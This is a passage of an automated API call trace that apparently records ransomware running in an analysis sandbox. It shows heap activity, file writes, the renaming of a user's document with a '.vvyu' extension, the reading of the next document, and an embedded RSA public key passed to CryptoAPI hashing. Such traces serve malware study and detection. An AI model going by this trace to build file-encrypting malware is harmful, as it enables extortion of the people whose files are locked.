Size=0xc) returned 0x2ae6230 [0192.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.550] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61e8 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae61d0 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0192.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.553] GetCurrentThreadId () returned 0x5d8 [0192.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7458 [0192.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0192.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.555] GetCurrentThreadId () returned 0x5d8 [0192.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0192.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0192.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61e8 [0192.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6248 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6260 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6200 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61d0 [0192.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0192.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0192.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3b70 | out: hHeap=0x2c0000) returned 1 [0192.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0192.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.574] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x17525, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x17525, lpOverlapped=0x0) returned 1 [0192.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.575] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1752a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.575] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.577] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.577] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.577] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.577] CloseHandle (hObject=0x584) returned 1 [0192.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0192.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.580] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\6_x m.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\6_x m.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\6_x m.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\6_x m.odp.vvyu")) returned 1 [0192.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.582] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0192.584] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2887e220, ftCreationTime.dwHighDateTime=0x1d8a609, ftLastAccessTime.dwLowDateTime=0x18814400, ftLastAccessTime.dwHighDateTime=0x1d8a6f6, ftLastWriteTime.dwLowDateTime=0x18814400, ftLastWriteTime.dwHighDateTime=0x1d8a6f6, nFileSizeHigh=0x0, nFileSizeLow=0x67e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ct fMZqR_ubHOI0.odt", cAlternateFileName="CTFMZQ~1.ODT")) returned 1 [0192.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0192.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.585] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\Ct fMZqR_ubHOI0.odt") returned=".odt" [0192.585] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\Ct fMZqR_ubHOI0.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ct fmzqr_ubhoi0.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.585] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=26599) returned 1 [0192.586] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.589] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x67c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.589] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.592] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.592] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x67e7, lpOverlapped=0x0) returned 1 [0192.593] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.593] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.593] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.593] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.594] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.594] CryptHashData (hHash=0x2a05e28, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.594] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.594] RtlAllocateHeap 